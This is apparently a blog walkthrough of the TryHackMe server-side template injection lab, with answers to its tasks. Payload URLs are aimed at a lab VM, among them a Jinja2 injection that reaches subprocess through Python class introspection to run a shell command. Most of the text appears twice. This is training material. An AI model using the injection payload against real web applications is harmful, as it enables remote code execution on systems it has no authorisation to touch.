TryHackMe - SSTI (Server-Side Template Injection) - Walkthrough
Introduction
Today we're going to be doing a walkthrough for the SSTI (Server-Side Template Injection) room hosted at https://tryhackme.com/room/learnssti . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed SSTI vulnerable VM as the the victim machine.
Task 1 - Introduction
Questions:
Understand all of the above.
No answer needed
Task 2 - Detection
Questions
What sequence of characters causes the application to throw an error?
Answer contained within Answer format
Task 3 - Identification
Questions
What template engine is being used in this application?
Navigate to the following URL in our web browser:
http://10.10.6.245:5000/profile/{{7*'7'}}
Compare the results to the contents of the URL below:
Task 4 - Syntax
Questions
How do you start a comment in Jinja2?
Search within the following URL (search term: “comment”)
https://jinja.palletsprojects.com/en/2.11.x/api/#jinja2.Environment
Task 5 - Exploitation
Questions
What is the result of the "whoami" shell command?
Navigate to the following URL in our web browser:
http://10.10.6.245:5000/profile/{{ ''.__class__.__mro__[1].__subclasses__()[401]("whoami", shell=True, stdout=-1).communicate() }}
Task 6 - Examination
Questions
Understand all of the above.
No answer needed
Task 7 - Remediation
Questions
Understand all of the above
No answer needed
Task 8 - Case Study
Questions
What payload was used to confirm SSTI?
Navigate to the following URL and search for the following term inside the page “ {{ ”
https://hackerone.com/reports/125980
Finish
Today we're going to be doing a walkthrough for the SSTI (Server-Side Template Injection) room hosted at https://tryhackme.com/room/learnssti . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed SSTI vulnerable VM as the the victim machine.
Task 1 - Introduction
Questions:
Understand all of the above.
No answer needed
Task 2 - Detection
Questions
What sequence of characters causes the application to throw an error?
Answer contained within Answer format
Task 3 - Identification
Questions
What template engine is being used in this application?
Navigate to the following URL in our web browser:
http://10.10.6.245:5000/profile/{{7*'7'}}
Compare the results to the contents of the URL below:
https://portswigger.net/research/server-side-template-injection#Identify
Task 4 - Syntax
Questions
How do you start a comment in Jinja2?
Search within the following URL (search term: “comment”)
https://jinja.palletsprojects.com/en/2.11.x/api/#jinja2.Environment
Task 5 - Exploitation
Questions
What is the result of the "whoami" shell command?
Navigate to the following URL in our web browser:
http://10.10.6.245:5000/profile/{{ ''.__class__.__mro__[1].__subclasses__()[401]("whoami", shell=True, stdout=-1).communicate() }}
Task 6 - Examination
Questions
Understand all of the above.
No answer needed
Task 7 - Remediation
Questions
Understand all of the above
No answer needed
Task 8 - Case Study
Questions
What payload was used to confirm SSTI?
Navigate to the following URL and search for the following term inside the page “ {{ ”
https://hackerone.com/reports/125980
Finish
Comments
Post a Comment